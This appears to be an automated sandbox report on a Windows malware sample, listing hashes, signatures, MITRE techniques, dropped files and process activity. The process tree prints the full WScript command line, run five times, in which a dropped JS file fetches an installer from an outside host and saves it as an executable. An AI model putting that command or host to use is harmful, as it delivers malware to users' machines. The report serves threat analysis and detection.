ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc

General

Target

ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe
Size

184KB
MD5

4179c5ceb76a6af8eb98c14a5f535d27
SHA1

44dc2f65435dd11a1505f8113d994595a9d368d0
SHA256

ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc
SHA512

6b206097b0bdaa5f58e52b28a72a7829d0abe6f5ff09fbd93030433364219cb3eb2618a55c2cc206d4d8c4eda755b5bc9307123237eeda0446a09ab15142da76
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO34I:/7BSH8zUB+nGESaaRvoB7FJNndn3I

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 10 IoCs

flow	pid	Process
4	1516	WScript.exe
7	1516	WScript.exe
8	748	WScript.exe
10	748	WScript.exe
11	1728	WScript.exe
13	1728	WScript.exe
14	1608	WScript.exe
16	1608	WScript.exe
17	1952	WScript.exe
19	1952	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1396	1520	WerFault.exe	22

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	8	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	14	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	17	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1520 wrote to memory of 1516	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	28
PID 1520 wrote to memory of 1516	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	28
PID 1520 wrote to memory of 1516	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	28
PID 1520 wrote to memory of 1516	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	28
PID 1520 wrote to memory of 748	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	31
PID 1520 wrote to memory of 748	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	31
PID 1520 wrote to memory of 748	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	31
PID 1520 wrote to memory of 748	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	31
PID 1520 wrote to memory of 1728	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	32
PID 1520 wrote to memory of 1728	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	32
PID 1520 wrote to memory of 1728	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	32
PID 1520 wrote to memory of 1728	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	32
PID 1520 wrote to memory of 1608	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	33
PID 1520 wrote to memory of 1608	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	33
PID 1520 wrote to memory of 1608	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	33
PID 1520 wrote to memory of 1608	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	33
PID 1520 wrote to memory of 1952	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	34
PID 1520 wrote to memory of 1952	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	34
PID 1520 wrote to memory of 1952	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	34
PID 1520 wrote to memory of 1952	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	34
PID 1520 wrote to memory of 1396	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	35
PID 1520 wrote to memory of 1396	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	35
PID 1520 wrote to memory of 1396	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	35
PID 1520 wrote to memory of 1396	1520	ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe	35

C:\Users\Admin\AppData\Local\Temp\ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe
"C:\Users\Admin\AppData\Local\Temp\ab7c1884205e0b4ff115dbd8b2faa90d51f5a88273b85f53b97c3db062428ccc.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1520
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufFFF2.js" http://www.djapp.info/?domain=NbAsWhakrp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fufFFF2.exe
  2⤵
  - Blocklisted process makes network request
  PID:1516
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufFFF2.js" http://www.djapp.info/?domain=NbAsWhakrp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fufFFF2.exe
  2⤵
  - Blocklisted process makes network request
  PID:748
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufFFF2.js" http://www.djapp.info/?domain=NbAsWhakrp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fufFFF2.exe
  2⤵
  - Blocklisted process makes network request
  PID:1728
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufFFF2.js" http://www.djapp.info/?domain=NbAsWhakrp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fufFFF2.exe
  2⤵
  - Blocklisted process makes network request
  PID:1608
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufFFF2.js" http://www.djapp.info/?domain=NbAsWhakrp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fufFFF2.exe
  2⤵
  - Blocklisted process makes network request
  PID:1952
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 500
  2⤵
  - Program crash
  PID:1396

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fufFFF2.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\J1KV9KY4.txt

Filesize
100B

MD5
9d01f106758f31a370c063b475d4b4ac

SHA1
f19a021b66b3cc6599411044d6598246ce8d6c01

SHA256
d24abe36e4ebd07cedc9629885df52766a294d9355b0a34f4d95c95b29891fc3

SHA512
3b98a06f1211b1609574b81ddb7bb72d80c70adc8b5956dbbe418e0874de6c8972799486eda6ad99b0b75ab40c432d865a6f43bb1d9a3faf7452776ac59e5493

Download Submit
memory/1520-54-0x0000000075501000-0x0000000075503000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing